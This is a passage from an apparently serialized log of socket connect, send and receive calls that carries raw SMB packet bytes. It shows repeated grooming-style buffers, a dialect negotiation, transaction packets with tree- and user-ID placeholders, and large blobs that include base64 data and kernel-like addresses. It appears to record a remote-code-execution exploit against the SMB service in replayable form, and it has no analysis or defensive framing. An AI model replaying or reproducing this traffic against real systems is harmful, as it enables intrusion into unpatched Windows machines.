00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 15, 0.0)\", \"('send', 14, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 16, 0.0)\", \"('send', 15, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 16, b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\x00@\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 16, 0.0)\", \"('send', 16, b'\\\\x00\\\\x00\\\\x00Q\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07@\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\x00@\\\\x00\\\\x0c\\\\xff\\\\x00\\\\x00\\\\x00\\\\x04\\\\x11\\\\n\\\\x00,\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x16\\\\x00\\\\xf8\\\\x87\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 16, 0.0)\", \"('close', 2, 0.0)\", \"('connect', 17, 0.0)\", \"('send', 17, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 18, 0.0)\", \"('connect', 19, 0.0)\", \"('send', 18, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 20, 0.0)\", \"('send', 19, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 21, 0.0)\", \"('send', 20, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 21, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('close', 16, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x001\\\\xffSMB+\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\x01\\\\x01\\\\x00\\\\x0c\\\\x00JlJmIhClBsr\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xf3\\\\x00\\\\x00\\\\x00\\\\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\\\\x80\\\\x00\\\\xa8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00 \\\\xf0\\\\xdf\\\\xff\\\\x00\\\\xf1\\\\xdf\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff`\\\\x00\\\\x04\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\xef\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x18\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00`\\\\x00\\\\x04\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xff\\\\xcf\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x009\\\\xbbfd4d9L7LS8S9B/wrEIUITZWAQeOPEtmB9vuq8KgrAP3loQnkmQdvP0QF9j8CIF9EdmNK3KEnH2CBme0Xxbx/WOOCBCDPvvjJYvcvf95egcjZ+dWquiACPOkTFW3JS6M+sLa/pa6uVzjjWOIeBX+V3Pu12C9PjUWOoRfFOAX+SFzVJL4ugpzxsVRvgFvIgqXupq+y6bfWsK90pWeE5qzBSTKcSepm0GPGr/rJg0hJn4aVBbsdnXxM2ZCDorVUsFUsF9vXC2UIJlsx5yEdThqQ5MoEd6tRwRSfYA87dvMJrPfpB8qLIaFHNX684tJJn30Bx0vnkLW3oRcGKuBqZdJ/PI4yIm++QVKkBLVa106S2gpwejplTs510cW0VN+8yVJAuZhPZSij7FLlAE4zS0bjSo6lP098nSduB9h9eziOeLhd1KG16h+g8xP2CV1VsNhr9ao+2cmCeiHYhbceDilST+ASGztHMWarFIlJUL6qlCrptzEJTk+er2j7SfHHT0nNtEa4+JRvPq5C21Kd1pcQ7vKlvZ5flQs1vvXTGZhYZKTv5lrdWNEtVEzGh+KvTFJxqKz5LNvLPT/0yRqcO6deL/nmv3UCt+B0Ut2X6cNonJG76Ut78wcRv4YP2MwApDS9fSz2AGGVxm246qiUiKWWtM6w40aDjuPH7gCQEoDHwhJgvLgmSaibPwjJrDzO0hMGDrp6SxwIFNS1G2oAPcvOn4CL4JDuLCBs08NtDrQysl0WMgCIBM+1O5D8Lue0J0359/4fCzqNCvBoqgyss9YWZb6wy6C/Kz4ak/Qmt74uXsA71fduIs3zEs6CAPpQQlvXMlZYWczpenAS2b+gO6aHHEFZBJmJ6Vy9I4RoLIPH/8Ig1ManJzkgPODvGvcuE/WUDFmiIiwGMlFMFTchBTVUQSPaLFWMUk6FqeO1LTY2/Rc3lSWSuBVeAAtlUNa6kfXqh/9==', 0.0)\", \"('recv', 1, 0.0)\", '(\\'send\\', 3, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\x